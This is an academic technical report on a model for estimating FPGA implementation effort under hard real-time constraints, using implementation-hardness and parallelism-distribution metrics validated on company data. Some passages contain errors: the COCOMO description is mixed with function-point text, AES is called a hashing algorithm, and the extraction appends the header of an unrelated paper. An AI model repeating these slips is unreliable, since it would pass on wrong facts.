In [3] it has been shown that every path in the algorithm(s) that the designer must implement adds to the development time and that the complexity of a design can be expressed by the number of independent paths in the algorithm(s). It has also shown that, when the experience of the designer is taken into account, a relation between the number of independent paths and development time exists and that it is possible to estimate the hardware implementation effort (in terms of development time) of applications.
However, in many cases the implementation can become very challenging when (hard) real-time constraints need to be fulfilled. Typically in such cases only a limited number of “implementational tracks” lead to a (or sometimes the) satisfying solution. This can be illustrated as in Fig. 1, where only one implementation track (the thick red line) satisfying the contraints. The idea on which this work builds upon is that real-time constraints make the implementation more difficult and that, in order to fulfill these constraints, designers need to perform certain optimizations in a certain order. Identifying a or the suitable track(s) adds to the overall development time since extra efforts must be spent at evaluating and applying the right combination (i.e. type and order) of optimization techniques. In order to take these considerations into account, we propose to complement and augment our prior work with several extensions. These extensions are described in Section I-B.
B. Contributions
One major contributor to the overall development time is the implementation effort. The contributions presented in this paper are i) a method and ii) a set of underlying models aiming at estimating the implementation effort, measured in time, of real-time constrained embedded applications. We propose an optimization model which takes some of the most common optimization techniques into account as well as the order in which they should be applied. An essential contribution of this work is a set of two metrics used to characterise the effects of optimisations. The first one expressing how hard it is to reach an implementation satisfying the real-time constraints for the implementation. The second one reflects how the distribution of parallelism in an algorithm influences the impact of the optimisations.
The remainder of the paper is organized as follows: section II introduces related works. Section III details the proposed methodology and section IV details the metric for the distribution of the parallelism. Subsequently, section V presents and discusses the experimental results obtained. Finally, section VI concludes the paper.
II. STATE OF THE ART - EFFORT ESTIMATION
To the best of our knowledge, very few works address the problem of estimating the hardware implementation effort of hard real-time constrained applications. On the other hand, there exist several approaches for estimating the software implementation effort, some of them providing ideas and directions for the hardware oriented ones. Thus, in this section we start by reviewing the most relevant approaches for estimating the software implementation effort and proceed with the few existing approaches for hardware implementation effort estimation.
Some of the most known and used tools for estimating the software implementation effort are the COCOMO project [2], function point [4], and SPQR/20 [5]. They all build upon the same concept: firstly, in order to quantify certain properties of an algorithm, a measure or set of measures is defined. Secondly, a model describing the relation between the measure(s) and the implementation effort is derived.
The core idea in COCOMO (COnstructive COst MOdel) [2] is that the effort mainly depends on the project size, i.e., Effort = A · size^b where A and b are adjustable parameters which must be trained in order to reflect the complexity, which in practice is left to the developers’ perception. The second stage is the adjustment of the function points based on 14 parameters which are tuned according to the characteristics of the application and of its environment. Subsequently, the function points are converted into a LOC measure based on an implementation language-dependent factor, which in turn can be used as an implementation effort estimation metric.
Function point [4] consists of two main stages: the first stage consists in counting and classifying the function types of the software: identified functions are weighted to reflect their complexity, which in practice is left to the developers’s perception. The second stage is the adjustment of the function points based on 14 parameters which are tuned according to the characteristics of the application and of its environment. Subsequently, the function points are converted into a LOC measure based on an implementation language-dependent factor, which in turn can be used as an implementation effort estimation metric.
SPOR/20 (Software Productivity, Quality and Reliability with regard to 20 influencing factors) has been proposed as a less heuristic-oriented variant of function point; experimental results [6] suggest that it can provide the same accuracy than function point while being simpler to work with.
Publications dealing with the estimation of hardware implementation effort are far less abundant than those dealing with software. Considering the context of the present work, interesting approaches include VHDL function point [7] and cost models such as [8]. Several other publications such as [9] compare actual hardware implementation efforts for different design methodologies but do not provide any systematic method to estimate those efforts.
VHDL function point, presented in [7], builds upon the idea of function points analysis and is modified to work with VHDL code. The approach consists in counting the number of internal I/O signals and components, and classifying these counts into levels. From there, a function point value related to VHDL is extracted. Experimental results considering the number of source lines in the LEON-1 processor project yields predictions which are within 20% of the real size. However, estimating the size does not always give an accurate indication of the implementation difficulty, especially when the application is subject to real-time constraints.
[8] introduces a cost model with the objective of understanding current Product Development Cycles (PDC) and evaluating the impact of new technologies on these PDC. In particular, the authors focus on cost and product development time and propose a PDC known as One Pass to Production.
(OPP) which takes both software and hardware aspects of a complete system into consideration. Although promising, their approach is very specific (they consider a FPGA-based NOC backbone) and the numerous assumptions made by the authors (e.g. regarding the number of required engineers) make it challenging to see how their approach could be made sufficiently generic to be applied to much more varied types of applications.
We can safely conclude that there is currently a lack of suitable and systematic methods and tools for estimating the hardware implementation effort for real-time constrained applications. In what follows we present our contribution to improve this situation.
III. METHODOLOGY
In [3] it has been shown that the hardware implementation effort can then be modelled as
\[ Effort = A(\eta(Dev) \cdot P(alg))^b \]
(1)
where \( \eta \) reflects the experience of the developer \( Dev \), \( P(alg) \) is the number of independent path in the algorithm \( alg \), and \( A \) and \( b \) are trim parameters.
Experimental results have shown that it is possible to estimate the hardware implementation effort, expressed as the development time, of applications and that the proposed model is able to estimate the need implementation effort with a confidence interval of 95%. However, this approach is not specifically targeting real-time constrained applications and is therefore not suitable for this type of application.
Since we in this work want to take hard real-time constraint into account, we propose a method which adds a parameter \( \tau(t_c) \) expressing the difficulty or hardness of reaching an implementation which meets the time constraint, \( t_c \). This parameter we will call implementation hardness and therefore the effort can be modeled as:
\[ Effort = A(\eta(Dev) \cdot P(alg) \cdot \tau(t_c))^b \]
(2)
The underlying idea is that as far the execution time \( t_{exec} \) is from \( t_c \) the more difficult it will be to fulfill \( t_c \). Whenever \( t_c \) is not met, optimizations have to be performed. However, modeling optimizations and their impact is not a trivial task for a designer; therefore, in what follows, we propose a method and a set of models which reflect the most common cases.
A. Real-Time Constraint
When optimizing the implementation to meet a real time constraint, the optimization strategies can be many fold. For a developer, the optimization strategy is very much application dependent but also depends on his experience and on his analytical thinking. Optimizations can fall into two different domains; spatial and temporal. Optimizations in the spatial domain include algorithmic parallelism exploitation on multiple functional units. For the temporal domain, different optimization techniques exist such as chaining and pipelining.
Typically, the type of optimization to be performed in the temporal domain is chosen depending on a) data/control dependencies in the algorithm and b) the constraint type:
- Throughput (pipelining)
- Latency (chaining)
Both type of constraints can benefit from parallelism exploration. Usually when analyzing an algorithm, for e.g. parallelism, the measure applied will indicate the potential of exploiting the entire parallelism in the algorithm, as for example with the measure \( \gamma \) [10]. Performing a straight manual implementation of an algorithm will usually not result in a complete exploitation of the parallelism. Either because it is not necessary or because the designer has omitted optimizations which could have a significant impact on the exploitation of the algorithm’s inherent parallelism.
An illustration of the overall optimisation approach is shown in Fig. 2. The starting point will usually be a sequential version of the algorithm. The developer chooses in which order he/she performs the different optimisations strategies. For our approach we constrain the optimisation strategy to follow the thick line.
In order to guide the designer in the exploration of the parallelism, this work considers a fully spatially parallelized algorithm as an extreme. Similarly, a complete chained implementation is also considered as extremes, these extremes indicate the bounds of how much speedup can be obtained when applying the respective type of optimization, without rewriting the algorithm.
Furthermore, not knowing the exact strategy that a development engineer is following, but knowing which options he/she has, our hypothesis is that it is possible to estimate the minimum number of optimizations required in order to
fulfill a real-time constraint. This, in turn, provides useful information which can be converted into the implementation hardness parameter, $\tau$, of Eq. 2 for estimating the required implementation effort.
It is therefore important to know how many optimizations inside the different categories should be applied in order to fulfill the time constraint, $t_c$. The next section describes the concept of estimating the execution time on basis of the number of optimizations.
**B. Optimisation Dependent Execution Time Estimation**

Every optimisation yields a certain speed-up to the execution time. Fig. 3 shows the execution time of an algorithm with different numbers of optimisations for the different optimisation categories. This is illustrated by the relation between the number of applied optimisations (represented by the small vertical lines) and the resulting execution time ($t_{exec}$) for several optimisation strategies (parallelization and parallelization+chaining).
The reduction (per optimisation) of the execution time gets smaller as the number of optimisations increases for a certain strategy. This is represented by the spacing between the small vertical lines. In order to arrive at an execution time equal to or smaller than the time constraint ($t_c$) represented by the dashed line, the designer can choose between several possible paths. An optimization path is the number of optimizations performed in the parallelization category followed by the number of optimizations performed by chaining. The number of optimisations in the different categories can vary since there can be more than one path satisfying the time constraint.
Therefore, it is necessary to know an estimate of the execution time for different optimization paths. In the following we describe how to estimate the execution time for the non-optimized case and the three different optimisation cases:
1) Case 0: No optimization (sequential execution): The most simple case is the sequential execution. To calculate the estimate, $t_{exec}$, we use the following equation:
$$t_{exec}(0) = \frac{NOP}{f_{arch}}$$
where $NOP$ denotes the number of operations in the sequential algorithm and $\frac{1}{f_{arch}}$ the time for executing one operation. In this work we assume that all operations can be considered as atomic and therefore have the same execution time.
2) Case 1: Parallel optimization: The estimated execution time, $t_{exec}(NOOPAR)$, when applying a certain number of parallelization optimisations, $NOOPAR$, can be expressed as:
$$t_{exec}(NOOPAR) = \frac{NOP}{\gamma_{impl}(NOOPAR) f_{arch}}$$
where $\gamma_{impl}(NOOPAR)$ expresses the degree of speed-up obtained with $NOOPAR$ number of optimisation. This can be calculated as:
$$\gamma_{impl}(NOOPAR) = \frac{NOP}{NOP - NOP_{opt}(NOOPAR)}$$
where $NOP_{opt}(NOOPAR)$ expresses the reduction in executed operations in the critical path when $NOOPAR$, number of optimizations, are applied. How to obtain this estimate is further discussed in section III-C.
All in all this gives:
$$t_{exec}(NOOPAR) = (NOP - NOP_{opt}(NOOPAR)) \frac{1}{f_{arch}}$$
3) Case 2: Chaining: Similarly, for chaining we can express the estimated execution time, $t_{exec}(NOOChain)$, as:
$$t_{exec}(NOOChain) = (NOP - NOP_{opt}(NOOChain)) \frac{1}{f_{arch}}$$
where $NOOChain$ denotes the number of applied chaining optimizations. Please note that, $f_{arch}$, the frequency of the architecture will typically change when creating larger operators.
4) Case 3: Combined: Combining the parallelized and chained cases will leave us with the following equations:
$$t_{exec}(NOOPAR,NOOChain) = \left( \frac{NOP}{\gamma_{impl}(NOOPAR)} - \frac{NOP_{opt}(NOOChain|NOOPAR)}{\varphi(NOOPAR)^{-1}} \right) \frac{1}{f_{arch}}$$
where $\varphi(NOOPAR)$ is a parallelism distribution measure which takes the fact that a chaining optimisation in the parallel context does not necessarily result in a reduction of the execution time. We discuss this later in section IV.
C. Optimisation Impact Estimation
When implementing an algorithm containing loops, different loops have different numbers of iterations. Typically, loops with larger numbers of iterations contribute more to the execution time of the algorithm than loops with small numbers of iterations. Optimizing an operation in a loop with a large number of iterations yields a larger reduction of the execution time. Assuming that the effort required to perform an optimisation does not change with the number of iterations, processing the loops with the largest number of iterations first, pays a larger impact on the reduction of the execution time for a given implementation effort. It is therefore essential to take this into account when estimating the optimisation impact on the execution time.
The real impact of an optimisation on algorithms that include loops cannot be known without deep inspection of the algorithm; however, an approximation would be beneficial. We therefore propose a measure approximating that. The requirements for defining such a measure include that it should reflect the number of executed operations compared to the number of operations that need to be implemented. In Fig. 4 a random algorithm containing loops is considered. The figure shows the relation between the number of optimisations and the corresponding reductions in the executed number of operations. The optimisations are ordered according to their impact on the execution time of the algorithm. The solid line represents the real impact. The dashed line, the average and the dotted line, the approximated. The real line corresponds to the case where the optimisations are fully prioritised according to their impact, the average line corresponds to the mean impact of a random optimisation strategy.
One interesting point in the graph in Fig 4 is the end point. The number of operations which can be parallelized as well as the number of operations which can be chained limit the possible number of optimisations. We denote the maximum number of optimisations for the parallel case as:
$$|NOOPAR|_{\text{max}} = NOP_{\text{impl}} - CP_{\text{impl}}$$
where $NOP_{\text{impl}}$ represents the number of implemented operations and $CP_{\text{impl}}$ the number of implemented operations which are present in the critical path. These numbers are different from $NOP$ and $CP$ when loops are present since the operations inside a loop are executed several times. Similarly to the measure in Eq. 9 a measure, $NOP_{\text{opt}}(|NOOPAR|_{\text{max}})$, for the maximum number of executed optimised operations can be calculated. The ratio between these two measures reflects the average impact of the loops present in the algorithm when taking the parallelism into account. This will be the slope of the average line in Fig. 4.
A similar approach is used for the chaining case except that the maximum number of optimisations is calculated as:
$$|NOOCh\text{ain}|_{\text{max}} (NOOPAR) = NOP_{\text{impl}} - P(NOOPAR)$$ \hspace{1cm} (10)
where $P(NOOPAR)$ denotes the number of paths in the algorithm, which is further detailed in section IV.
It turns out to be difficult to obtain a good and stable first order approximation of the impact of the loops in the algorithm based on the limited number of data which we have available. We have therefore decided to use the average as a measure for the impact of an optimisation which can be calculated as:
$$NOP_{\text{opt}}(NOOPAR) = \frac{NOP_{\text{opt}}(|NOOPAR|_{\text{max}})}{|NOOPAR|_{\text{max}}} NOOPAR$$
and
$$NOP_{\text{opt}}(NOOCh\text{ain}|NOOPAR) = \frac{NOP_{\text{opt}}(|NOOCh\text{ain}|_{\text{max}} (NOOPAR))}{|NOOCh\text{ain}|_{\text{max}} (NOOPAR)} NOOCh\text{ain}$$ \hspace{1cm} (12)
IV. METRICS
A. Metric of distribution of parallelism
When chaining operators, the impact on the execution time depends on whether the optimisations are done in the critical path or in other paths. For this work we expect that the developer has carefully analysed the algorithm and is only optimising where it is most feasible, i.e. in the critical path.

However, chaining operations in the critical path can lead to a situation where the path which was originally the critical one is reduced, due to the optimisations, so another path becomes the longest one. Fig 5 shows three different examples, all having 15 nodes and a critical path of 5, which gives a speedup measure, γ = 3. Fig 5a shows an example where the initial critical path (grey) has the same length as the two other paths in the algorithm (highly distributed case). Chaining two operations in the critical path will change the longest path to one of the two others. Opposite to this, Fig 5b shows an example where the initial critical path is significantly longer (narrow case), which means that chaining operations in this case will lead to a reduction of operations in the initial critical path. In between, Fig 5c shows a more average example.
Knowing the graph would make it possible to derive the exact reduction of the algorithm’s critical path with a specific number of chaining optimisations. However, not knowing the graph but only the average speedup, γ, the number of operations and the length of the initial critical path makes it challenging to predict this reduction.
In order to obtain a more sufficient estimate of the effect of an average chaining optimisation, we propose a metric which considers the distribution of the parallelism in the algorithm.
It is desirable that such a metric has the following properties: in case of a highly distributed parallelism (see Fig 5b), i.e. many paths in the algorithm, the value of the metric should converge towards one. In case the distribution is “narrow” (see Fig 5a), i.e. the number of paths is equivalent to the speedup, the metric should give a value close to zero.
Most graphs will not fall into the two extremes from Fig 5, but will be more like the average case. In order to obtain the metric of the the average contribution of chaining optimisations, we propose a mechanism with which any graph can be transformed and handled as a combination of the two extremes. The transformation is illustrated in Fig 6. The mechanism is as follows: keep the critical path fixed and substitute the off critical paths (i.e. all paths excluding the critical one) with paths having their average length.
Doing this transformation brings us to a simplified problem where we first can handle chaining as the narrow distributed case, and second as the highly distributed case. It is given that the impact of the chaining optimisation will always be better or equal to this simplified model, with this number of paths. An optimisation following this model is shown in Fig 7.
In order to handle that graph as the narrow distributed case, it is important to know how large the difference between the critical path and the off critical paths is. To do so we utilize $P(\text{NOO}_{\text{PAR}})$, the number of paths of the parallel-optimised algorithm. The difference between the critical path and the average of the off critical paths can then be calculated as:
$$M = \left(1 - \frac{\gamma - 1}{P(\text{NOO}_{\text{PAR}}) - 1}\right)CP \quad (13)$$
when the critical path is changed so that the critical path has the same length as the average of the off critical paths, the scenario changes to the highly distribution extreme. The rest of the chaining optimisations are handled as so.
Since most algorithms do not fall into one of the two extremes, when estimating the impact of a certain number of...
chaining optimisations the average measure is more representative than the measure obtained based on considering the two extremes.
Furthermore, it can be shown that the real impact from optimisation will be equal to or better than the average of the simplified model\(^1\). Using such a measure will therefore ensure that the estimates of the chaining optimisation impact are not overestimated.
The measure for the impact of a chaining optimisation can therefore be denoted by the following:
\[
\phi(\text{NOO}_{\text{PAR}}) = \left( \frac{M}{\text{NOP}} + \frac{CP - M}{\text{NOP} - M} \right)
\]
(14)
With all these defined we are now ready to find the number of optimisations need to fulfil the real-time constraint, and define the metric expressing how hard it is to reach this implementation. We call this metric for implementation hardness.
B. Implementation hardness
Knowing the maximal number of possible optimisations and the minimum needed to meet the time constraint, the ratio (Eq: 15) between these two indicates how much the implementation needs to be investigated. Using the analogy with the implementation tracks, a number close to one indicates that almost all possible optimisations in the algorithm need to be considered, and only a very limited number of tracks will lead to a solution. Finding these solutions will require a lot of effort. On the other hand a number close to zero indicates that almost all possible optimisations in the algorithm need to be considered, and only a very limited number of tracks will result in a satisfying solution. Hereby less effort is probably needed.
\[
\tau(t_c) = \frac{|\text{NOO}_{\text{PAR,Chain}}(t_c)|_{\text{min}}}{|\text{NOO}_{\text{PAR,Chain}}|_{\text{max}}}
\]
(15)
Using \(\tau(t_c)\) in Eq. 2 we are now able to express the implementation hardness, \(\tau(t_c)\), and thereby refine the estimated implementation effort.
V. RESULTS
Similar to when we developed the implementation effort estimation technique in [3], we will verify the proposed improvement by first building a model on basis of the same training data as in [3], and then validate the model with a set of validation data, which is also the same as used earlier. By doing so, we are able to first test if our real-time validness and tune the proposal, and still use the second set of real-life data to evaluate whether it generalizes.
To summarize, the training data originates from two different application types that are both developed as academic projects in universities in France. The training data has therefore not been produced specifically for this project, but is comparable to data from industrial projects. The first application is composed of five different video processing algorithms that are able to track moving objects in a video sequence. The second application is a cryptographic system, where we use the hashing algorithms, MD5, AES and SHA-1, as well as a combined crypto engine, which is also part of the system. The developers for the training data have been a Ph.D. student and M.Sc.EE. students, as can be seen in Table I.
The validation data originates from a local company, ETI A/S, which is a Danish SME. The dataset contains algorithms from a state-of-the-art network system and consists of Ethernet applications implemented on FPGAs, as well as corresponding testbeds. The system is a real-time system with hard time constraints, and all algorithms were implemented as to meet these constraints. The developers for the validation data had some experience before starting the implementation as shown in Table I. For more information about the data we would like to point the reader to [3].
A. Training Data
Fig. 8 shows the training data where the uncorrected complexity as defined by the number of linearly independent paths (as defined in [3]) is plotted in relation to the needed effort. A small update in the method of how to measure the independent paths have been applied compared to [3]. This implies that we now only measure the core of the algorithm, which is the part going to be implemented on the FPGA, and do not include small fragments of data formatting code. Taking these data and applying the original experience transformation on the data, results in the picture shown in Fig. 9. A least-squares fit trend line can be extracted to form our model (Eq. 1):
\[
\text{Effort} = A(\eta(\text{Dev})) \cdot P(\text{alg})^b
\]
(16)
where the trim parameters \(A = 0.196\) and \(b = 1.191\). This is depicted as the dash-dot-dash line.
In Fig 11, the new parameter \(\tau(t_c)\) taking the real-time constraint into account is applied. The \(\tau(t_c)\) value for the different algorithms is shown in the upper part of Table II. This changes the complexity for the different algorithms a little, and a new least-squares fit line of our model is depicted with the dashed line. The trim parameters of our model (Eq. 2):
\[
\text{Effort} = A(\eta(\text{Dev})) \cdot P(\text{alg}) \cdot (\tau(t_c))^b
\]
(17)
are now \(A = 0.209\) and \(b = 1.181\).
A comparison of the two models is shown in Table III, where the model taking the real-time constraint into account performs slightly better. However the result is not statistical significant. However, we continue with the
B. Validation Data
We continuing by validating the correctness of the model using the validation data. In Fig 11, the corrected validation data are shown together with the model, which is depicted by the dashed line, and a 95% confidence interval. Both the model and confidence interval are extracted from the training data. It is clear that most algorithms fit nicely with the proposed model and are well within the confidence interval. The exceptions are
algorithm SS4 and SS5. In the next section we will discuss this in details. The mean and variance of the prediction errors are shown both with and without SS4 and SS5 in Table IV.
C. Discussion of result
Most of the algorithms fit nicely with the proposed model and are well within the confidence interval. The improved model indeed does perform better than the original model, which had a mean error of 0.2 and a variance of 8. Taking a closer look at Table II shows that for all the Ethernet algorithms, except for SS3, we obtain an implementation hardness value $\tau(t_c)$ very close to one. This indicates that the implementations have been very close to the maximum achievable with the algorithm. This fits very well with the knowledge that these algorithms are used in state of the art high performance systems. However, the result for SS3 shows that it should have been possible to choose a less optimised solution and still meet the constraints, which would have resulted in a reduction of the implementation time, at least if the model holds for this algorithm.
An exception to these results are the SS4 and SS5 algorithms, where the estimates do not fit the model. Looking at Table II again, we see that their implementation hardness value is set to 1. This is an error value actually indicating that the time constraint cannot be met with the current algorithm, and an algorithm transformation is needed. This indicates that the algorithm which is used for estimating the complexity of the implementation and thereby the needed effort, will not be able to fulfill the requirements, and an algorithm transformation is probably needed. Not going into details with the two algorithms, we can say that their final implementations involve a lot of bit manipulation which is not easily reflected in the initial C algorithm which is used for the measurement. A safe conclusion is therefore that if the implementation hardness factor indicates the need for algorithm transformation, the result would hardly be covered by the proposed model.
Furthermore it is also important to stress that our set of data originates from a single company with few developers. So strictly speaking we can only conclude that this model can be applied to the specific SME setup involved in the study and partially to the academic environment studied. A large volume and variety of experimental data for training and validation is needed to generalise our model. Also, the model can be refined with more parameters for more precise results.
VI. CONCLUSION
Accurate development time estimates are an essential tool for project managers working in the embedded systems industry. Obtaining such estimates is challenging and in particular very few existing works can provide hardware implementation effort estimates. In this paper we have presented our contribution to this topic, namely a systematic and structured approach for estimating the hardware implementation effort of hard real-time constrained applications.
The underlying idea off this work is that implementing a system is more difficult when hard real-time constraints must
---
**Table I**
<table>
<thead>
<tr>
<th>Developer</th>
<th>Ph.D. stud.</th>
<th>0</th>
</tr>
</thead>
<tbody>
<tr>
<td>Dev 1</td>
<td></td>
<td></td>
</tr>
<tr>
<td>Dev 2</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 3</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 4</td>
<td>Stud. (EE)</td>
<td>0</td>
</tr>
<tr>
<td>Dev 5</td>
<td>BSc.EE.</td>
<td>9</td>
</tr>
<tr>
<td>Dev 6</td>
<td>MSc.EE.</td>
<td>15</td>
</tr>
<tr>
<td>Dev 7</td>
<td>MSc.EE.</td>
<td>9</td>
</tr>
<tr>
<td>Dev 8</td>
<td>MSc.EE.</td>
<td>8</td>
</tr>
<tr>
<td>Dev 9</td>
<td>MSc.EE.</td>
<td>8</td>
</tr>
</tbody>
</table>
**Table II**
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Complexity</th>
<th>$\tau(t_c)$</th>
<th>Developer</th>
<th>Dev. Exp.</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>10</td>
<td>0.97</td>
<td>Dev 1</td>
<td>2</td>
</tr>
<tr>
<td>T2</td>
<td>24</td>
<td>0.99</td>
<td>Dev 1</td>
<td>10</td>
</tr>
<tr>
<td>T3</td>
<td>12</td>
<td>0.91</td>
<td>Dev 1</td>
<td>18</td>
</tr>
<tr>
<td>T4</td>
<td>14</td>
<td>0.96</td>
<td>Dev 2</td>
<td>1</td>
</tr>
<tr>
<td>T5</td>
<td>4</td>
<td>0.89</td>
<td>Dev 1</td>
<td>20</td>
</tr>
<tr>
<td>MD5</td>
<td>10</td>
<td>0.98</td>
<td>Dev 3</td>
<td>1</td>
</tr>
<tr>
<td>AES</td>
<td>10</td>
<td>0.99</td>
<td>Dev 4</td>
<td>8</td>
</tr>
<tr>
<td>SHA-1</td>
<td>27</td>
<td>0.98</td>
<td>Dev 4</td>
<td>14</td>
</tr>
<tr>
<td>Combined</td>
<td>59</td>
<td>0.99</td>
<td>Dev 4</td>
<td>14</td>
</tr>
<tr>
<td>SS1</td>
<td>25</td>
<td>0.99</td>
<td>Dev 6, 7</td>
<td>150</td>
</tr>
<tr>
<td>SS2</td>
<td>35</td>
<td>0.98</td>
<td>Dev 5</td>
<td>150</td>
</tr>
<tr>
<td>SS3</td>
<td>17</td>
<td>0.26</td>
<td>Dev 5, 6, 7, 8</td>
<td>150</td>
</tr>
<tr>
<td>SS4</td>
<td>50</td>
<td>1</td>
<td>Dev 6</td>
<td>6</td>
</tr>
<tr>
<td>SS5</td>
<td>29</td>
<td>1</td>
<td>Dev 7</td>
<td>3</td>
</tr>
<tr>
<td>SS6</td>
<td>25</td>
<td>0.99</td>
<td>Dev 5, 6, 7</td>
<td>3</td>
</tr>
<tr>
<td>Ethernet app</td>
<td>60</td>
<td>0.99</td>
<td>Dev 5, 6, 7, 8, 9</td>
<td>150</td>
</tr>
<tr>
<td>App 4</td>
<td>9</td>
<td>0.94</td>
<td>Dev 6</td>
<td>150</td>
</tr>
</tbody>
</table>
**Fig. 8.** Relation between the implementation effort [number of weeks] and the uncorrected complexity.
be fulfilled since designers have to identify a or the suitable implementational track(s) that lead to a satisfying solution. We have proposed an optimization model which takes some of the most common optimization techniques into account as well as the order in which they are applied. In particular we have suggested a set of two metrics which are used to characterise the effects of optimisations. The first one, the implementation hardness metric, reflects how hard it is to reach an implementation satisfying the real-time constraints for the application. The second one, the parallelism distribution metric, reflects how the distribution of parallelism in an algorithm influences the impact of the optimisations. The experimental results is not unambiguous: for the model the major improvement of the accuracy comes from refining the way the complexity of training data is measured compared to our prior work. A small and not statistical significant improvement comes applying the implementation hardness measure. When validating the model with the validation data,

Fig. 9. Relation between the implementation effort [number of weeks] and the complexity corrected according to the designers experience model.

Fig. 10. Relation between the implementation effort [number of weeks] and the complexity corrected according to the designers experience model and the hardness of meeting the real-time constraint.
### TABLE III
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Original Model Error</th>
<th>New Model Error</th>
</tr>
</thead>
<tbody>
<tr>
<td>T1</td>
<td>0.67</td>
<td>2.19</td>
</tr>
<tr>
<td>T2</td>
<td>1.38</td>
<td>3.29</td>
</tr>
<tr>
<td>T3</td>
<td>-0.82</td>
<td>-1.56</td>
</tr>
<tr>
<td>T4</td>
<td>-2.96</td>
<td>-4.45</td>
</tr>
<tr>
<td>T5</td>
<td>-1.53</td>
<td>-3.14</td>
</tr>
<tr>
<td>MD5</td>
<td>0.09</td>
<td>0.51</td>
</tr>
<tr>
<td>AES</td>
<td>2.57</td>
<td>6.65</td>
</tr>
<tr>
<td>SHA-1</td>
<td>2.10</td>
<td>5.28</td>
</tr>
<tr>
<td>Combined</td>
<td>-1.40</td>
<td>-2.83</td>
</tr>
</tbody>
</table>
Mean (Variance): 1.50 (3.39) 1.42 (3.07)
### TABLE IV
<table>
<thead>
<tr>
<th>Algorithm</th>
<th>Estimation Error</th>
</tr>
</thead>
<tbody>
<tr>
<td>SS1</td>
<td>-0.14</td>
</tr>
<tr>
<td>SS2</td>
<td>0.91</td>
</tr>
<tr>
<td>SS3</td>
<td>2.71</td>
</tr>
<tr>
<td>SS4</td>
<td>-9.64</td>
</tr>
<tr>
<td>SS5</td>
<td>-8.04</td>
</tr>
<tr>
<td>SS6</td>
<td>0.19</td>
</tr>
<tr>
<td>Ethernet app</td>
<td>0.90</td>
</tr>
<tr>
<td>App 4</td>
<td>0.96</td>
</tr>
</tbody>
</table>
Mean (Variance): -1.56 (22.02)
Mean without SS4 and SS5 (Variance): 0.92 (0.98)
most of the data approve the model, and fit with it very well. A mean error of 0.92 week (variance 0.98) is achieved, when not considering two outlying data points for which our implementation hardness measure indicate that the time constraint for these algorithms can not me met. Strong algorithm transformation is probably need here and safe conclusion will therefore be that the proposed model will hardly cover these cases.
In order to strengthen the result this work need to be evaluated with more cases. The work would also benefit from making room for other optimisation strategies such as pipelining.
REFERENCES
|
{"Source-Url": "https://vbn.aau.dk/ws/portalfiles/portal/33970914/TechReport.pdf", "len_cl100k_base": 9521, "olmocr-version": "0.1.53", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 35051, "total-output-tokens": 10267, "length": "2e13", "weborganizer": {"__label__adult": 0.0008320808410644531, "__label__art_design": 0.0010557174682617188, "__label__crime_law": 0.0007038116455078125, "__label__education_jobs": 0.0009737014770507812, "__label__entertainment": 0.0001685619354248047, "__label__fashion_beauty": 0.0005092620849609375, "__label__finance_business": 0.0007357597351074219, "__label__food_dining": 0.0006160736083984375, "__label__games": 0.001839637756347656, "__label__hardware": 0.053466796875, "__label__health": 0.0012569427490234375, "__label__history": 0.0006780624389648438, "__label__home_hobbies": 0.00046372413635253906, "__label__industrial": 0.0026531219482421875, "__label__literature": 0.00033283233642578125, "__label__politics": 0.0004911422729492188, "__label__religion": 0.0010404586791992188, "__label__science_tech": 0.31884765625, "__label__social_life": 9.363889694213869e-05, "__label__software": 0.007366180419921875, "__label__software_dev": 0.6025390625, "__label__sports_fitness": 0.0006680488586425781, "__label__transportation": 0.002288818359375, "__label__travel": 0.0003938674926757813}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 43170, 0.04778]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 43170, 0.39288]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 43170, 0.90843]], "google_gemma-3-12b-it_contains_pii": [[0, 485, false], [485, 4991, null], [4991, 10117, null], [10117, 14692, null], [14692, 19137, null], [19137, 24055, null], [24055, 27527, null], [27527, 33254, null], [33254, 38108, null], [38108, 40752, null], [40752, 43170, null]], "google_gemma-3-12b-it_is_public_document": [[0, 485, true], [485, 4991, null], [4991, 10117, null], [10117, 14692, null], [14692, 19137, null], [19137, 24055, null], [24055, 27527, null], [27527, 33254, null], [33254, 38108, null], [38108, 40752, null], [40752, 43170, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43170, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43170, null]], "pdf_page_numbers": [[0, 485, 1], [485, 4991, 2], [4991, 10117, 3], [10117, 14692, 4], [14692, 19137, 5], [19137, 24055, 6], [24055, 27527, 7], [27527, 33254, 8], [33254, 38108, 9], [38108, 40752, 10], [40752, 43170, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43170, 0.22768]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
ebabf65e6b2ef9269fae1a621c547821fff21b2d
|
A Component Coordination Model Based on Mobile Channels
Juan Guillen-Scholten∗ C
Farhad Arbab∗
Frank de Boer∗
CWI, P.O. Box 94079, NL-1090 GB Amsterdam, The Netherlands
{juan, farhad, frb}@cwi.nl
Marcello Bonsangue∗†
LIACS, Leiden University, P.O. Box 9512, 2300 RA Leiden, The Netherlands
